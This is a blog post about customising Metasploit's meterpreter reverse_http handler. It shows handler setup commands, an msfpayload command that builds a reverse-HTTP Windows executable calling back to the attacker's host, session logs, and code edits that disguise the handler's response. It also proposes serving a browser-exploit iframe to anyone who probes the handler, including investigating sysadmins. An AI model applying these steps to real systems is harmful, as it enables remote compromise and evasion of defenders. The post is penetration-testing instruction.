Creating a better meterpreter reverse_http handler…

EDIT: As of framework commit 912bfd5, the features described in this post are now part of the framework itself…

learning just a little more about how MSF works…

IMHO, meterpreter/reverse_http is one of the best payloads available in the metasploit arsenal, this post is about modifying the handler part, so it will look less suspicious, and will provide more options for popping even more boxes “if we want”.

As indicated by its name, the communication between the payload and the framework  takes place over the HTTP protocol, where the handler functions as some kind of a special “web server”, a smart, special web server … that manages multiple sessions and is capable of differentiating between legal requests “coming from exploited machines” and illegal requests “coming from search engine bots or a smarty-pants sysadmin who noticed something” … let’s see a quick example:

Setting up a handler:

msf > use exploit/multi/handler 
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf  exploit(handler) > set LPORT 8080
LPORT => 8080
msf  exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf  exploit(handler) > exploit -j -z
[*] Exploit running as background job.
[*] Started HTTP reverse handler on http://192.168.59.132:8080/
[*] Starting the payload handler...

Creating the exe:

root@bt:~# msfpayload windows/meterpreter/reverse_http LPORT=8080 LHOST=192.168.59.132 X > reverse_http.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_http
 Length: 350
Options: {"LPORT"=>"8080", "LHOST"=>"192.168.59.132"}

Run on target:

msf exploit(handler) >
[*] 192.168.59.1:16454 Request received for /isH8...
[*] 192.168.59.1:16454 Staging connection for target /isH8 received...
[*] Patched user-agent at offset 641512...
[*] Patched transport at offset 641172...
[*] Patched URL at offset 641240...
[*] Patched Expiration Timeout at offset 641772...
[*] Patched Communication Timeout at offset 641776...
[*] Meterpreter session 4 opened (192.168.59.132:8080 -> 192.168.59.1:16454) at 2012-12-19 15:06:06 -0500

 How the traffic looks like:

05

Everything is going smooth, the handler, well, “handled” the payload connection … let’s see what happens when a casual “web-surfer” hits that special web server:

01

That’s nice of metasploit, but how it actually makes that happen “handle payload connections correctly, and throw the un-welcoming message at bad requests” is going to be another story for another day, today, we focus on how to change that ugly-looking and not-very-useful message… and adding some nastiness along the way…

Changing the HTML response body “the bad way to do it”

That message is specified in the file “core/handler/reverse_http.rb”, look for it under the framework installation directory, the value to be changed is “resp.body” just before the end of the file.

06

Change that, save the file, reload the framework and next time the casual visitors will be greeted with whatever you specify there (please read through to find THE better way to do that) ….

Warning! Evil thoughts ahead …

Yes, my evil friend, you can create a (browser autopwn, SET, Blackhole exploit kit … etc.) listening on a different port, and make that “resp.body” include an iframe that loads the browser exploit, so, if someone is connecting to your handler, he’d better be pwned, or he is just one step closer to get pwned 🙂 … I’ll leave the details on how to do that to your imagination, but trust me, it’s a lot of fun …

Changing the HTML response body “the good way to do it”

It doesn’t make sense to manually crack the file open and change the value, right? let’s create a new advanced parameter to that handler, and make it as a variable 🙂 … please follow along:

  • Open the above mentioned file “core/handler/reverse_http.rb”, look for the section that starts with “register_advanced_options

07

  • Create a new line like the following “put it BEFORE THE LAST LINE that reads OptAddress.new” or at least take care of the `,` at the end of each line or it will come back an bite you … only the last one doesn’t have a `,` :
OptString.new('HttpUknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>'  ]),
  • Now we have a new “advanced variable” called “HttpUknownRequestResponse” … let’s use it.
  • Change “resp.body”:
resp.body    = "#{datastore['HttpUknownRequestResponse']}"

That’s it 🙂 let’s see the fruits of our “hard” work … run msfconsole, and type “show advanced”

08

That’s no fun … let’s try something else:

set HttpUnknownRequestResponse '<html><center><h1> Sup! </h1><img src="http://www.spwallpapers.com/var/albums/640x480/Cute%20kittens%20wallpapers%20640X480/Cute%20kittens%20cell%20phone%20wallpapers%20640X480%20(02).jpg?m=1343909313"></center></html>'

Now:

09

… you got the idea … and even though this might be a small modification to be included in the framework, I submitted a pull request anyway.

EDIT: well, the pull request got approved and now it’s a part of the framework “/me: happy”

https://github.com/rapid7/metasploit-framework/pull/1187

 

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.